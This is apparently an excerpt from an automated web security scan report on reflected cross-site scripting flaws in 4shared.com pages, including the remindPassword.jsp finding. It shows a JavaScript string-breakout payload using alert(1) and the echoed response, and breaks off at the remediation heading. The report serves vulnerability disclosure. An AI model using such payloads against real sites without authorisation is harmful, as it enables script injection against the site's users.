var url="/abuse.jsp?aLink=http://www.4shared.com/82467"-alert(1)-"f15a819900/BBQD/1/video";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

5.60. http://www.4shared.com/remindPassword.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /remindPassword.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aea29"-alert(1)-"e20dd6bf12d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail